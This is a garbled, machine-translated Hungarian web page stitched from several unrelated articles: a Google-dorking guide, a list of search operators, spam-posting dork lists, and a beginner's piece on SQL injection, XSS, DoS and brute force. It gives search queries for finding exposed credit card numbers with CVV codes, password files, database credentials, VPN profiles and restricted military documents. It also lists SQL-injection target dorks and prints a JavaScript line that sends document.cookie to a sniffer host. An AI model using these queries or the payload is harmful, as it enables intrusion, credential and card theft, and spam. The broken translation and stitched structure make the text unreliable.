bejáratInurl Artist View PHP ID. A JSQL injekció használatának utasításai - Multifunkcionális eszköz a Kali Linux-ban SQL injekciók kereséséhez és működtetéséhez
A magán adatok megszerzése nem mindig azt jelenti, hogy hacking - néha megjelentek közös hozzáférés. Tudás google beállítások És egy kis doboz lehetővé teszi, hogy sok érdekeset találjon - a hitelkártyaszámoktól az FBI dokumentumokig.
Figyelem
Minden információ kizárólag tájékoztató jellegű. Sem a szerkesztők, sem a szerző nem felelős az e cikk szerinti anyagok által okozott esetleges kárért.Ma ma csatlakozik az internethez, egy kicsit törődik a hozzáférés korlátozásáról. Ezért sok privát adat lesz bányászati \u200b\u200bkeresőmotorok. Robots- „pókok” már nem korlátozódik a weboldalakat, és az indexek a teljes tartalmat a hálózaton elérhető, és folyamatosan növelték előnyüket adatbázisok nem célja, hogy hozzák nyilvánosságra. Csak ismered ezeket a titkokat - csak tudnod kell, hogyan kell kérdezni őket.
Fájlokat keresünk
Az ügyes kezekben a Google gyorsan megtalálja mindazt, ami rosszul fekszik a hálózaton - például személyes adatokat és szolgáltatási fájlokat. Gyakran elrejtik a szőnyeg alatti kulcsot: nincsenek hozzáférési korlátozások, az adatok egyszerűen a webhely hátsó udvarán fekszenek, ahol a linkek nem vezetnek. A szabványos Google Webes felület csak a alapbeállítások Kiterjesztett keresés, de még akkor is elég lesz.
Korlátozza a megadott típusú fájlok keresését a Google-ban két operátor használatával: Filetype és Ext. Az első beállítja azt a formátumot, amelyet a keresőmotor meghatározta a fájl fejlécét, a második a fájl kiterjesztése, függetlenül annak belső tartalmától. Mindkét esetben keresve csak meg kell adnia a kiterjesztést. Kezdetben az EXT utasítás kényelmes volt olyan esetekben, amikor a fájlformátum sajátosságai hiányoztak (például az INI és a CFG konfigurációs fájlok kereséséhez, amelyben minden lehet). Most a Google algoritmusok megváltoztak, és nincsenek látható különbség a piaci szereplők között - az eredmények a legtöbb esetben ugyanazok.
Szűrő kiadás
Alapértelmezés szerint a szavak és általában bármely beírt Google karakterek az indexelt oldalak összes fájlját keresik. A keresési területet domain szerint korlátozhatja felső szint, Bizonyos helyszínen vagy a kívánt szekvencia helyén a fájlokban. Az első két lehetőség, a SITE utasítás segítségével, ami után a domain nevet vagy a kiválasztott helyet lépett. A harmadik esetben egy egész sor szereplők lehetővé teszi, hogy keressen információt az irodai területeken és a metaadatokat. Például az Allinurl törli a testben megadott hivatkozásokat, Allinanchor - a címkével ellátott szövegben , Allintitle - az oldalak címsorában, allintext - az oldalak testében.
Minden egyes üzemeltető számára egy rövidebb név van rövidebb névvel (minden konzol nélkül. A különbség az, hogy az Allinurl minden szóval kapcsolatos linkeket töröl, és az inurl csak az elsővel rendelkezik. A lekérdezés második és későbbi szavai bárhol megtalálhatók a weboldalakon. Az Inurl operátor különbséggel rendelkezik egy másik hasonló jelentéssel is. Az első lehetővé teszi, hogy a karaktersorozatot a kívánt dokumentumra (például / CGI-BIN /) találja meg, amelyet széles körben használnak az ismert sebezhetőségekkel rendelkező komponensek kereséséhez.
Próbáljuk meg a gyakorlatban. Az AllIntext szűrőt, és megteszünk, hogy a kérelem megadja a hitelkártyák számának és hitelesítési kódjainak listáját, amelynek érvényességét csak két év alatt lejár (vagy amikor a tulajdonosok belefáradtak az összes sorban történő táplálásáról).
Allintext: Kártya száma lejárati dátum / 2017 Cvv 
Amikor elolvastad a híreket, hogy a fiatal hacker "szaggatta a szervereket" a Pentagon vagy a NASA, bámult a titkos információk, akkor a legtöbb esetben az ilyen elemi technika a Google használatához. Tegyük fel, hogy érdekelnek a NASA alkalmazottai és elérhetőségeik listáján. Biztosan ilyen lista elektronikus formában van. A kényelem vagy a túlterhelés miatt maga a helyszínen feküdhet. Logikus, hogy ebben az esetben ez nem link, mivel a belső használatra szánt. Milyen szavak lehetnek egy ilyen fájlban? Legalább - a "Cím" mező. Ellenőrizze, hogy ezek a feltételezések könnyebbek legyenek, mint az egyszerűek.
Inurl: nasa.gov filetipe: XLSX "Cím"
Bürokráciát használunk
Hasonló találatok egy szép kis dolog. A valóban szilárd fogás részletesebb ismeretét biztosítja a Google-üzemeltetők számára a webmesterekhez, a hálózathoz és a kívánt szerkezetének jellemzőihez. A részletek ismerete, könnyen kiszűrheti a kibocsátást, és tisztázhatja a kívánt fájlok tulajdonságait, hogy a fennmaradó részben valóban értékes adatokat kapjon. Vicces, hogy a bürokrácia a mentéshez jön. Tipikus megfogalmazást hoz létre, amelyre kényelmes, hogy keressen egy esélyes titkos információt.
Például egy elosztási nyilatkozat kötelező az Egyesült Államok Védelmi Minisztériumának irodájában, a dokumentumelosztás szabványos korlátozásait jelenti. Litera jelölt nyilvános kiadványok, amelyekben nincs semmi titok; B - A belső használatra szánták, a C szigorúan bizalmas és az F. külön-külön, érdemes az X betűt, amely különösen értékes információkat jelez, amelyek a legmagasabb szintű állami rejtélyt képviselik. Hagyja, hogy az ilyen dokumentumok azokat keressék, akiket a szolgáltatás adósságán kell elvégezni, és az irodalmi C.-vel rendelkező fájlokra korlátozódik. A DODI 5230,24 irányelv szerint az ilyen jelölést az export alá tartozó kritikus technológiák leírását tartalmazó dokumentumokhoz rendelik ellenőrzés. Olyan óvatosan védett információkat érzékelhet a legmagasabb szintű domainben található helyszíneken. Millen az amerikai hadsereg számára.
"Elosztási nyilatkozat C" InurL: Navy.mil 
Nagyon kényelmes, hogy csak az USA-ból származó weboldalakat és szerződéses szervezeteit a tartományban gyűjtik össze. A tartományi korlátozás keresése rendkívül tiszta, és a címsorok magukért beszélnek maguknak. Keresés ezen a módon az orosz titok szinte használhatatlan: káosz uralkodik domains.ru, és a nevét sok fegyver rendszerek hangzik botanikai (PP „Kiparis” ACS „Acacia”), vagy egyáltalán mesés (Tos „Buratino”).
Óvatosan vizsgálja meg a webhelyről szóló dokumentumot a.mil-tartományban, más markerek láthatók a keresés finomítása érdekében. Például a "SEC 2751" exportkorlátozásra való hivatkozás, amely szintén érdekes technikai információk kereshető. Időről időre hivatalos webhelyekből származik, ahol egyszer megvilágított, így ha a kiadatás keresése nem sikerül egy érdekes linken, használja a Google Cash (gyorsítótár-üzemeltetőt) vagy az internetes archívumot.
A felhőkbe mászunk
Amellett, hogy véletlenül minősítését dokumentumokat a kormányzati szervek, a Kesche Google néha hivatkozott linkeket a személyes fájlokat a Dropbox és más tárolási szolgáltatásokat hoznak létre „privát” hivatkozások nyilvánosan közzétett adatok. Alternatív és házi készítésű szolgáltatások még rosszabb. Például a következő lekérdezés megtalálja az összes Verizon ügyfelek adatait, amelyben az FTP-kiszolgáló az útválasztóba van telepítve.
Allinurl: FTP: // verizon.net
Ezek az okos emberek most már több mint negyvenezer, és 2015 tavaszán nagyságrendűek voltak. A Verizon.net helyett helyettesítheti bármely híres szolgáltató nevét, és mit fog tudni, annál nagyobb lehet a fogás. A beépített FTP-kiszolgálón keresztül a fájlok láthatóak a routerhez csatlakoztatott külső meghajtón. Általában a távoli munka, a személyes felhő vagy néhány pirítós szék. Az ilyen média összes tartalmát a Google és más keresőmotorok indexelik, így a külső lemezeken tárolt fájlok közvetlen link segítségével érhetők el.
A konfigurációkat kémítjük
A felhők előtt a felhők, az egyszerű FTP szerverek, amelyekben elég sebezhetőség is volt a felhők távoli tárolóként. Sokan közülük eddig releváns. Például a népszerű WS_FTP professzionális programkonfigurációs adatok, a felhasználói fiókok és a jelszavak a WS_FTP.INI fájlban vannak tárolva. Könnyű megtalálni és olvasni, mivel az összes rekordot szöveges formátumban tárolják, és a jelszavakat a Triple des algoritmus titkosítja a minimális obsuscation után. A legtöbb változatban elég csak az első bájt eldobására.
Az ilyen jelszavak megfejtése egyszerűen használható a WS_FTP jelszó dekódoló segédprogrammal vagy ingyenes webszolgáltatással.
Az önkényes helyszínek hackelről beszélve, általában jelszót jelent a CMS konfigurációs fájlok vagy alkalmazások naplóiról és biztonsági mentéseiről e-kereskedelem. Ha ismeri a tipikus struktúrát, könnyen megadhatja kulcsszavak. A WS_FTP.INI-ban találkozó sorok rendkívül gyakoriak. Például Drupal és Prestashopban van egy felhasználói azonosító (UID) és a megfelelő jelszó (PWD), és a kiterjesztésű fájlok összes információja tárolódik. Keresés az alábbiak szerint:
"pwd \u003d" "uid \u003d" ext: Inc
A DBMS jelszavak feltárása
Az SQL Server konfigurációs fájlokban, nevekben és címekben email A felhasználók tárolódnak nyissa meg a videótA jelszavak helyett a HiSi MD5-et rögzítik. Hogy megfejtsük őket, szigorúan szólva, lehetetlen azonban megtalálni a jól ismert Steam Hash jelszót.
Még mindig vannak olyan adatbázisok, amelyek még nem használnak jelszót. A böngészőben egyszerűen megtekinthető konfigurációs fájlokat.
INTEXT: DB_PASSWORD Filetype: Enn
Az advent windows szerverek A konfigurációs fájlok helye részben elfoglalt a rendszerleíró adatbázisban. Az ágai általi keresés pontosan ugyanúgy lehet, mint a REG-t fájl típusként. Például, mint ez:
Filetype: Reg HKEY_CURRENT_USER "jelszó" \u003d
Ne felejtsd el a nyilvánvaló
Néha eljut zárt információ A véletlenül nyitott és a nézet területén lehetséges Google adatok. A tökéletes lehetőség, hogy megtalálja a jelszavak listáját bármilyen közös formátumban. Tárolja a fiókadatokat szöveges fájl, dokumentumszó. elektronikus excel asztal Csak kétségbeesett emberek tudnak, de csak elég.
Filetype: XLS inurl: Jelszó
Egyrészt rengeteg eszköz van az ilyen incidensek megelőzésére. Meg kell határoznia a Htaccess, PATT CMS megfelelő hozzáférési jogokat, ne használja a bal szkripteket és zárja be más lyukakat. A robots.txt kivételes listája is van, amely megtiltja a keresőmotorokat, hogy indexelje a benne meghatározott fájlokat és könyvtárakat. Másrészt, ha a robots.txt szerkezete egy szerveren eltér a szabványtól, azonnal világossá válik, hogy megpróbálják elrejteni.
A könyvtárak és fájlok listáját bármely webhelyen a szabványos felirat indexe előzi meg. Mivel a szolgáltatásnyújtás címére kell megfelelnie, érdemes korlátozni keresését az Intle operátor által. Érdekes dolgok vannak a könyvtárakban / admin / / személyes /, / etc / sőt / titokban /.
Kövesse a frissítéseket
A relevancia nagyon fontos itt: A régi sebezhetőségek nagyon lassan közel vannak, de a Google és a keresési példakumenta folyamatosan változik. Az "utolsó második" szűrő (& tbs \u003d qdr: s a kérés végén) és a "valós idejű" (& tbs \u003d qdr: 1) között is különbség van.
Időintervallum dátuma utolsó frissítés A Google-fájl implicit módon is jelezhető. A grafikus webes felületen keresztül kiválaszthatja az egyik szabványos időszakot (óra, nap, hét és így tovább), vagy állítsa be a dátumtartományt, de ez a módszer nem alkalmas az automatizálásra.
Látvány alapján címsor Csak akkor lehet kitalálni, hogy korlátozza az eredmények kimenetét a & tbs \u003d qdr :. Az Y betű az egy év korlátja után (& tbs \u003d qdr: y), az M megjeleníti az eredményeket az elmúlt hónapban, W - a héten, D - az elmúlt napon, H - mert utolsó óra, n - per perc, és s - másodpercenként. A híres Google frissebb eredményei a szűrőt és a tbs \u003d QDR-t használják: 1.
Ha ravasz szkriptet szeretne írni, hasznos lehet tudni, hogy a dátumtartomány a Google-ban Julian formátumban van beállítva a daterange operátoron keresztül. Például itt talál egy listát. pDF dokumentumok A szó bizalmas, letöltötte a január 1-től július 1-től 2015. július 1-ig.
Bizalmas Filetype: PDF Katerange: 2457024-2457205
A tartományt Julian dátumok formátumában mutatjuk be, anélkül, hogy figyelembe vesszük a frakcionált részt. Fordítsa őket manuálisan a gregorián naptárból kényelmetlen. Könnyebb használni a dátum-átalakítót.
A célzás és a szűrés ismét
A további operátorok megadása mellett a keresési lekérdezésben közvetlenül a link testébe küldhet. Például a filetípus tisztítása: A PDF megfelel az AS_Filetype \u003d PDF designnak. Így kényelmes minden pontosítás beállítása. Tegyük fel, hogy a kibocsátási eredmények csak a Hondurasi Köztársaság adják hozzá CR \u003d Countryhn a keresési URL-t és csak a város Bobrujszki - GCS \u003d Bobruisk. A Fejlesztői részben talál egy teljes listát.
A Google Automatizálási eszközöket úgy tervezték, hogy megkönnyítsék az életet, de gyakran problémákat adnak hozzá. Például a felhasználó által a WHOIS-t a város határozza meg. Ezen információk alapján a Google-ban a szerverek közötti terhelés nemcsak kiegyensúlyozott, hanem megváltoztatja a keresési eredmények eredményeit is. A régiótól függően, ugyanazzal a lekérdezéssel különböző eredmények esnek az első oldalra, és néhány közülük egyáltalán rejtve lehet. A kozmopolita érzése és az országokból származó információk megjelenése segíti a kétbetűs kódot a GL \u003d országról szóló irányelv után. Például a Hollandia-NL és a Vatikán és Észak-Korea kódja nem megengedett.
Gyakran a kibocsátás keresése még több fejlett szűrő használata után is elképzelhető. Ebben az esetben könnyű tisztázni a kérelmet néhány kivételt hozzáadásával (mielőtt mindegyikük mínusz jel). Például a személyes, a banki, a nevek és a bemutató szerint gyakran használják. Ezért a tisztabb keresési eredmények nem fognak megjeleníteni a kérés helyett, de finomított:
Intitle: "Index / személyes /" -Names -Tutorial-Banking
Egy példa végül
A kifinomult hackert azzal jellemzik, hogy magukat maguknak biztosítják magukat. Például a VPN kényelmes dolog, de drága vagy ideiglenes és korlátozások. Készítsen előfizetést magadnak egy túl drága. Jó, hogy vannak csoportosítási előfizetések, és a Google segítségével könnyen válhat egy csoport részévé válni. Ehhez elegendő megtalálni a Cisco VPN konfigurációs fájlt, amely meglehetősen nem szabványos PCF kiterjesztéssel és felismerhető pályával rendelkezik: programfájlok \\ Cisco Systems \\ VPN kliens \\ profilok. Egy kérés, és belépsz például a Bonn Egyetem barátságos csapatában.
Filetype: PCF VPN vagy csoport
Információ
A Google megtalálja konfigurációs fájlok Jelszavakkal, de sokan titkosított formában vannak írva, vagy hash-val helyettesítve. Ha a fix hosszúságú sorokat látja, akkor a dekódolási szolgáltatás azonnal keres.A jelszavakat titkosított formában tárolják, de Maurice Massar már írt egy programot a dekódolásukért, és ingyenes a TecampusGeeks.com-on keresztül.
-Ért google Súgó Több száz történik különböző típusok Támadások és behatolási tesztek. Számos lehetőség van a népszerű programokra, a fő adatbázisformátumokra, számos PHP sebezhetőségre, felhősre és így tovább. Ha győződjön meg róla, hogy keresi, akkor nagymértékben egyszerűsíti a szükséges információk megszerzését (különösen azt, amely nem tervezte az egyetemes tulajdonságot). Nem Shodan egyetlen táplálja az érdekes ötleteket, de az indexelt hálózati erőforrások minden alapja!
Hogyan keressünk minket a Google.com webhelyre
Minden valószínűleg tudja, hogyan kell használni keresőmotorMint a Google \u003d), de nem mindenki tudja, hogy ha szakértőnként keressen egy keresési lekérdezést speciális tervek segítségével, akkor elérheti az eredményeket, amiket sokkal hatékonyabb és gyorsabban keresnek \u003d) Ebben a cikkben megpróbálok megmutatni mit kell tennie, hogy helyesen keresse meg a keresést
A Google támogatja a több kiterjesztett keresési operátort speciális jelentéssel, amikor a Google.com keresése során. Jellemzően ezek az operátorok megváltoztatják a keresést, vagy akár azt is mondják, hogy a Google teljesen megteszi különböző típusok Keresés. Például, tervezés link: egy különleges üzemeltetőés lekérdezés link: www.google.com. Nem ad neked egy normál keresést, hanem megtalálja az összes weboldalt, amelyek kapcsolódnak a Google.com-on.
Alternatív kérelmek
gyorsítótár: Ha más szavakat is kérhet, a Google kiemeli ezeket a mellékelt szavakat a gyorsítótárban lévő dokumentumon belül.
Például, cache: www.site web Megmutatja a gyorsítótárazott tartalmat egy kiemelt szó "Web".
link: A fenti keresési lekérdezés megmutatja a megadott lekérdezéshez kapcsolódó weboldalakat.
Például: link: www.syt. Jelenítse meg az összes olyan oldalt, amelyen van egy link a http: //www.site
Összefüggő: A "Hasonló" (kapcsolt) megadott weboldalak megjelenítése.
Például, kapcsolódó: www.google.com. felsorolja a hasonló weboldalakat honlap Google.
info: Kérjen információkat: Néhány információt fogok bemutatni arról, hogy a Google a kért weboldalról szól.
Például, Info: webhely Információ a fórumunkról \u003d) (Armada - Forum Adalt Webmasters).
Egyéb információs kérések
határozza meg: A kérelem definiálása: megadja a különböző hálózati forrásokból származó szavakat követő szavak meghatározását. A definíció a teljes bevitt kifejezésre lesz (azaz a pontos lekérdezésben szereplő összes szót).
készletek: Ha elindít egy kérést a készletekről: A Google kezeli a lekérdezési idő többi részét az Exchange jelentések szimbólumaként, és lépjen kapcsolatba az oldalon ready Information Ezekhez a karakterekhez.
Például, készletek: Intel Yahoo Információk megjelenítése az Intel és a Yahoo-ról. (Ne feledje, hogy karaktereket kell nyomtatnia legfrissebb hírek, nem vállalati név)
Lekérdezés módosítók
webhely: Ha bekapcsolja a webhelyet: A kérésedben a Google korlátozza az ezen a területen található weboldalak eredményeit.
Ön is kereshet egyedi zónákat ilyen ru, org, com stb. Site: com. site: Ru.)
allintitle: Ha az Allintitle kérését futtatja: a Google korlátozza az eredményeket a cím összes kérésére.
Például, allintitle: Google Keresés Visszaadja az összes Google oldalt, mint a képek, blog stb. Keresésével
intitle: Ha az Intitle-t bekapcsolja: A kérésedben a Google korlátozza a címben lévő szót tartalmazó dokumentumok eredményeit.
Például, intitle: Business
allinurl: Ha az Allinurl kérését futtatja: A Google korlátozza az eredményeket, az összes szóval az URL-ben.
Például, allinurl: Google keresés Visszaadja a dokumentumokat a Google-lal és keresse meg a címet. Szintén opcióként megoszthatja a Slash (/) szavakat, majd a Slash mindkét oldalán lévő szavakat egy oldalon megkülönböztetik: példa allinurl: foo / bar
inurl: Ha bekapcsolja az Inurl-t: az Ön kérésére a Google korlátozza az URL-ben lévő szót tartalmazó dokumentumok eredményeit.
Például, Animáció inurl: webhely
iNTEXT: Csak az oldal szövegében keres, a megadott szót, figyelmen kívül hagyva a címet és a hivatkozási szövegeket, és más nem kapcsolódik. Ez a módosító származéka is van - allintext: azok. Továbbá, a kérelemben szereplő összes szó csak a szövegben kerül sor, ami szintén fontos, figyelmen kívül hagyva a gyakran használt szavakat a linkekben
Például, iNTEXT: Fórum
időintervallum: Az ideiglenes keretek keresése (daterange: 2452389-2452389), az idő dátuma Julian formátumban jelenik meg.
Nos, mindenféle érdekes példa a kérésekre
Példák a Google lekérdezésére. A spammerek számára
Inurl: control.Guest? A \u003d jel
Site: Books.dreambook.com "Homepage URL" "aláírja az" Inurl: Sign
Site: www.freeGb.net honlap
Inurl: sign.asp "karakterszám"
"Üzenet:" Inurl: sign.cfm "feladó:"
Inurl: Register.php "Felhasználói regisztráció" "honlap"
Inurl: Edu / Vendégkönyv "Jelentkezzen be a vendégkönyvbe"
Inurl: post "hozzászólás" "URL"
Inurl: / Archívum / "Megjegyzések:" "Emlékezz az információra?"
"Script és vendégkönyv:" URL: "Megjegyzések:"
Inurl :? Akció \u003d Add "PHPBook" "URL"
Intitle: "Új történet benyújtása"
Magazinok
Inurl: www.livjournal.com/users/ mód \u003d Válasz
Inurl greatestjournal.com/ mód \u003d Válasz
Inurl: fastbb.ru/re.pl?
Inurl: fastbb.ru/re.pl? "Vendégkönyv"
Blogok
Inurl: blogger.com/comment.g? "PostaD" "névtelen"
Inurl: typepad.com/ "hozzászólás küldése" "Emlékezzen személyes információra?"
Inurl: GreatestJournal.com/community/ "Hozzászólás" "A névtelen poszterek címei"
"Hozzászólás" "címek a névtelen plakátok" -
Intitle: "Hozzászólás küldése"
Inurl: Pirillo.com "hozzászólás küldése"
Fórumok
Inurl: gate.html? "Név \u003d Fórumok" "MODE \u003d Válasz"
Inurl: "fórum / posting.php? Mód \u003d válasz"
Inurl: "mes.php?"
Inurl: "Tagok.html"
Inurl: fórum / taglist.php?
Úgy döntöttem, hogy egy kicsit beszélek az információbiztonságról. A cikk hasznos lesz az újonc programozók és azok, akik most kezdtek el foglalkozni a FRONTING fejlesztésében. Mi a probléma?
Sok újdonságfejlesztő annyira szereti az írási kódot, hogy teljesen elfelejtik munkáik biztonságát. És ami a legfontosabb - felejtsd el az ilyen sebezhetőséget, mint SQL kérés, XXS. És még az adminisztratív paneleket is feltalálják a jelszavakat, és bruthfororsnak vannak kitéve. Melyek ezek a támadások és hogyan lehet elkerülni őket?
SQL injekció
Az SQL injekció az adatbázis leggyakoribb támadása, amelyet egy adott DBMS SQL lekérdezésével végeznek. Sokan ilyen támadásokban szenvednek és még nagyvállalatok. Ok - Fejlesztő hiba egy adatbázis írásakor, és valójában, SQL lekérdezések.
Az SQL beágyazott típusú támadás lehetséges az SQL lekérdezésekben használt bemeneti adatok helytelen feldolgozása miatt. A támadás sikeres áthaladásával a hacker, akkor veszélyezteti, hogy nemcsak az adatbázisok tartalmát, hanem a jelszavakat és a naplókat is elveszíti közigazgatási panel. És ez az adat elég lesz ahhoz, hogy teljes mértékben birtokolja a webhelyet, vagy visszafordíthatatlan kiigazításokat végezzen hozzá.
A támadás sikeresen lejátszható a PHP, ASP, Perl és más nyelveken írt szkriptekben. Az ilyen támadások sikere több attól függ, hogy mely DBMS-t használják, és hogyan valósul meg a parancsfájl. A világon sok sebezhető hely van az SQL injekciókhoz. Ez könnyű megbizonyosodni. Elég a "Dorki" beírása - ezek különleges kérések a sérülékeny webhelyek keresésére. Itt van néhány közülük:
- inurl: index.php? id \u003d
- inurl: trainers.php? id \u003d
- inurl: buy.php? kategória \u003d
- inurl: cikk.php? id \u003d
- inurl: play_old.php? id \u003d
- inurl: deklaráció_more.php? DecT_ID \u003d
- inurl: PageID \u003d
- inurl: Games.php? ID \u003d
- inurl: oldal.php? Fájl \u003d
- inurl: newsdetail.php? id \u003d
- inurl: galéria.php? id \u003d
- inurl: cikk.php? id \u003d
Hogyan kell használni őket? Csak írja be őket a Google vagy a Yandex keresőmotorba. A keresőmotor nem csak egy sebezhető helyet ad, hanem egy oldalt is a biztonsági rés. De nem fogjuk megállítani, és győződjünk meg arról, hogy az oldal nagyon sérülékeny. Ezért elegendő az "ID \u003d 1" érték után, hogy egyetlen idézetet tegyen "". Valami ilyesmi:
- inurl: Games.php? ID \u003d 1 '
És a webhely hibát ad nekünk sQL kérés. Mit kell folytatnia a hackerünk folytatásához?
És aztán szüksége van rá, hogy a legtöbb link az oldalhöz hiba esetén. Ezután a legtöbb esetben a sebezhetőségen dolgozik a "Kali Linux" eloszlásában a segédprogramokkal ebben a részben: az injekciós kód bevezetése és a szükséges műveletek végrehajtása. Hogyan fog megtörténni, nem tudom megmondani. De ez megtalálható az interneten.
XSS támadás
Ez a fajta támadás végrehajtásra kerül cookie-k fájlok. Ők, szívesen menteni a felhasználókat. Miért ne? Milyen nélkülük van? Végtére is, a cookie-knek köszönhetően, nem vezetünk jelszót százszor a VK.com vagy mail.ru. És kevés azok közül, akik megtagadják őket. De az interneten a hackerek, a szabály gyakran jelenik meg: A kényelmi együttható közvetlenül arányos a nem biztonságos együtthatóval.
Az XSS támadás megvalósításához a hackerünknek szüksége van a tudás Javascriptre. A nyelv első pillantásra nagyon egyszerű és ártalmatlan, mert nincs hozzáférése a számítógépes erőforrásokhoz. A JavaScript Hackerrel való együttműködés csak a böngészőben lehet, de ez elég. Végtére is, a legfontosabb dolog, hogy beírja a kódot a weboldalra.
Nem fogok részletesen beszélni a támadás folyamatáról. Csak az alapokat és a jelentését fogom mondani, hogy hogyan történik.
Hacker hozzáadhat néhány fórumot vagy vendégkönyvet JS-Code:
A szkriptek továbbítják minket a fertőzött oldalon, ahol a kódot végrehajtják: Legyen egy szippantó, bármilyen tároló vagy exposoil, amely egyébként elrabolja a cookie-kat a gyorsítótárból.
Miért csak JavaScript? Mivel a JavaScript tökéletesen védi a webes kéréseket, és hozzáférhet a cookie-khoz. De ha a forgatókönyve néhány webhelyre lefordít minket, a felhasználó könnyen észrevehető. Itt a hacker több ravasz opciót alkalmaz - csak belép a kódba a képbe.
Img \u003d új kép ();
Img.src \u003d "http://192.168.1.7/sniff.php?" + Kdocument.cookie;
Csak hozzunk létre egy képet, és attribútumot hozzunk neki, mint egy címünket.
Hogyan védjük meg magadat? Nagyon egyszerű - ne menjen gyanús linkekre.
DOS és DDOS támadások
DOS (ENG-től. A szolgáltatás megtagadása - a karbantartás elmulasztása) - Hacker támadása a számítástechnikai rendszeren annak érdekében, hogy meghibásodjon. Ez az ilyen feltételek létrehozása, amelyek szerint a rendszer Bona Fide felhasználói nem férhetnek hozzá a rendelkezésre álló rendszererőforrások (kiszolgálók), vagy ez a hozzáférés nehéz. A rendszer meghibásodása egy lépés lehet a felvétel felé, ha bármilyen kritikus információ van a szabadúszóban: például egy verzió, rész szoftverkód stb. De leggyakrabban ez a gazdasági nyomás mértéke: egy olyan egyszerű szolgáltatás elvesztése, amely jövedelmet okozott. A szolgáltató vagy a gondozási intézkedések beszámolása kézzelfogható a zsebében. A jelenben a DOS és DDOS támadások a legnépszerűbbek, mivel lehetővé teszi, hogy szinte bármilyen rendszert hozzon létre a kudarchoz, nem hagyja abba a jogilag jelentős bizonyítékot.
Mi a különbség a DOS-tól a DDOS támadásból?
A Dos egy intelligens módon épített támadás. Például, ha a kiszolgáló nem ellenőrzi a bejövő csomagok helyességét, akkor a hacker ilyen kérést készíthet, amelyet örökre feldolgozhat, és a processzor ideje nem lesz elég ahhoz, hogy más kapcsolatokkal dolgozzon. Ennek megfelelően az ügyfelek megtagadják a fenntartást. De oly módon, hogy túlterheljen vagy tiltsa le, a nagy híres helyek nem fognak működni. Megakadályozhatják a meglehetősen széles körű csatornákat és nagy teherbírású kiszolgálókat, amelyek problémák nélkül megbirkóznak az ilyen túlterheléssel.
A DDOS valójában ugyanaz a támadás, mint DOS. De ha a DOS egy kéréscsomagban, akkor a DDOS-ban nagyon sok száz és több. Még a nagy teherbírású szerverek is nem tudnak megbirkózni az ilyen túlterheléssel. Adok egy példát.
A Dos Attack az, amikor beszélgetsz valakivel, de van valamiféle nem nyilvános személy, és hangosan sikoltozik. Ez lehetetlen beszélni, vagy nagyon nehéz. Megoldás: Mert a biztonság, amely megnyugszik, és egy személyt vezetett ki a szobából. DDOS támadások - ez az, amikor az ilyen nem kompatibilis emberek zsúfolt tömege van. Ebben az esetben a védelem nem lesz képes csavarozni és vezetni.
A DOS és DDO-k számítógépekből, úgynevezett zombikból készülnek. Ez egy hacker-hacker-számítógépek olyan felhasználók számára, akik nem is gyanítják, hogy autójuk részt vesz a szerver támadásában.
Hogyan védjük meg magadtól? Általában semmi. De bonyolíthatja a hacker feladatait. Ehhez válasszon jó hosting erőteljes kiszolgálókkal.
Bruteforce támadás
A fejlesztő sok védelmi rendszert hozhat létre a támadásoktól, teljes mértékben hozta az általunk írt szkripteket, ellenőrizze a sebezhetőség helyét stb. De amikor jön utolsó lépés Site Clasters, nevezetesen, amikor könnyű jelszót helyezni az adminisztrátor számára, elfelejtheti az egyik dolgot. Jelszó!
Szigorúan nem ajánlott egyszerű jelszót telepíteni. Ez lehet 12345, 1114457, VASYA111, stb. Nem ajánlott 10-11 karakternél kevesebb jelszót helyezni. Ellenkező esetben a legközségesebb és nem nehéz támadásnak van kitéve - Bruthfors.
A brutforok a szótárban szereplő jelszó támadása különleges programok. A szótárak különbözőek lehetnek: latin, mellszobor a számokban mondjuk bármilyen tartományra, vegyes (latice + számok), és még van szótárak egyedi szimbólumokkal @ # 4 $% & * ~ `'' stb.
Természetesen ez a fajta támadás könnyen elkerülhető. Növelje kifinomult jelszó. Még egy PIN-kódot is menthet. És akkor is, ha a webhely készült CMS, akkor sokan számítani hasonló típusú támadás, és blokkolja az IP. Szükséges mindig emlékezni a jelszó különböző karaktereire, a legnehezebb felvenni.
Hogyan működik a "hackerek"? A legtöbb esetben előzetesen gyanítanak vagy ismerik a jelszót. Elég logikus feltételezni, hogy a felhasználói jelszó biztosan nem fog 3 vagy 5 karakterből állni. Az ilyen jelszavak gyakori hackekhez vezetnek. Többnyire a hackerek 5-10 karakterből állnak, és több karaktert is tartalmaznak, amelyek talán előre tudják. Ezután generálja a jelszavakat a kívánt tartományokkal. A Kali Linux eloszlásában is vannak programok ilyen esetekben. És voila, a támadás már nem tart sokáig, mivel a szótár mennyisége már nem olyan nagy. Ezenkívül a hacker használhatja a videokártya erejét. Néhányan támogatják a CUDA rendszert, míg az integritás folyamata már 10-szer nő. És itt látjuk, hogy a támadás így van egyszerű út Nagyon valóságos. De Brutfu nemcsak helyszíneket tesz ki.
Kedves fejlesztők, soha ne felejtsük el az információs biztonsági rendszert, mert ma sok ember van ilyen támadási fajokból, beleértve az államokat is. Végtére is, a legnagyobb sebezhetőség olyan személy, aki mindig elvonható valahol vagy valahol nem. Programozók, de nem programozott gépek. Legyen mindig figyelmeztetés, mert az információvesztés súlyos következményekkel jár!